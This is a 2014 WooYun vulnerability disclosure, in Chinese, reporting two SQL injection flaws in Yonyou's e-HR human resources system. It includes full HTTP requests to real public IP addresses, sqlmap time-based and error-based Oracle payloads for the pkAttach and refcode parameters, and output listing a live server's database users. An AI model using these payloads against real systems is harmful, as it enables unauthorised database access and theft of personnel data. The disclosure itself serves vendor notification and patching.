当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-078679

漏洞标题:用友人力资源管理(e-HR)SQL注入漏洞(2枚)

相关厂商:用友软件

漏洞作者: ToySweet

提交时间:2014-10-14 14:41

修复时间:2015-01-12 14:42

公开时间:2015-01-12 14:42

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-10-14: 细节已通知厂商并且等待厂商处理中
2014-10-14: 厂商已经确认,细节仅向厂商公开
2014-10-17: 细节向第三方安全合作伙伴开放
2014-12-08: 细节向核心白帽子及相关领域专家公开
2014-12-18: 细节向普通白帽子公开
2014-12-28: 细节向实习白帽子公开
2015-01-12: 细节向公众公开

简要描述:

不知道有没有提交过,用友人力资源管理(e-HR)SQL注入漏洞

详细说明:

以http://219.140.193.253/hrss/login.jsp为例子


参考了下 WooYun: 用友人力资源管理(e-HR)SQL注入漏洞
发现一个未授权访问页面
http://120.40.72.157:4001/hrss/rm/RmPsnbasdoc.jsp

woo2.png


访问后抓包发现提交了下面数据包(存在sql注入)

GET /hrss/attach.download.d?appName=PSNBASDOC_RM&pkAttach=null HTTP/1.1
Host: 120.40.72.157:4001
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: image/webp,*/*;q=0.8
If-Modified-Since: Mon, 29 Nov 2010 06:26:56 GMT
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.149 Safari/537.36
Referer: http://120.40.72.157:4001/hrss/rm/RmPsnbasdoc.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=0000SEy6l3QB7cxKKvHYMHKoOyF:1832fauj5


算法和payload
读取所有用户

Place: GET
Parameter: pkAttach
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: appName=PSNBASDOC_RM&pkAttach=0001C110000000089L9S' AND 7542=DBMS_P
IPE.RECEIVE_MESSAGE(CHR(74)||CHR(84)||CHR(106)||CHR(102),5) AND 'SUXH'='SUXH
    Vector: AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAG
E('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)
---
[21:38:25] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[21:38:25] [INFO] fetching database users
[21:38:25] [INFO] fetching number of database users
[21:38:25] [INFO] resumed: 27
database management system users [27]:
[*] AAA
[*] ANONYMOUS
[*] CTXSYS
[*] DBSNMP
[*] DIP
[*] DMSYS
[*] EXFSYS
[*] IUFO
[*] MDDATA
[*] MDSYS
[*] MGMT_VIEW
[*] NC
[*] NC_TEST
[*] OLAPSYS
[*] ORACLE_OCM
[*] ORDPLUGINS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SI_INFORMTN_SCHEMA
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
[*] ZHOUJP


还没完
当我们点击民族时候抓取如下数据包

GET /hrss/ref.show.d?refcode=HI000000000000000003 HTTP/1.1
Host: 120.40.72.157:4001
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.149 Safari/537.36
Referer: http://120.40.72.157:4001/hrss/rm/RmPsnbasdoc.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=0000SEy6l3QB7cxKKvHYMHKoOyF:1832fauj5


SQLMAP跑了下,算法和payload

sqlmap identified the following injection points with a total of 0 HTTP(s) requ
sts:
---
Place: GET
Parameter: refcode
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: refcode=HI000000000000000003' AND 5453=(SELECT UPPER(XMLType(CHR(6
)||CHR(58)||CHR(113)||CHR(113)||CHR(110)||CHR(110)||CHR(113)||(SELECT (CASE WHE
 (5453=5453) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(116)||CHR(110)||CHR(1
0)||CHR(113)||CHR(62))) FROM DUAL) AND 'iZqc'='iZqc
    Vector: AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_S
ART]'||(REPLACE(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[
OLLAR_REPLACE]'),'@','[AT_REPLACE]'),'#','[HASH_REPLACE]'))||'[DELIMITER_STOP]'
|CHR(62))) FROM DUAL)
---
[21:42:29] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[21:42:29] [INFO] fetched data logged to text files under 'F:\sqlmapproject-sql
ap-ef5ce7e\output\120.40.72.157'
[*] shutting down at 21:42:29


发现只要这类url都存在SQL注入
其他版本

wooyun4.png

漏洞证明:

WOO3.png


wooyun4.png

修复方案:

建议对未授权访问页面加上cookie验证

版权声明:转载请注明来源 ToySweet@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-10-14 14:56

厂商回复:

问题很严重

最新状态:

暂无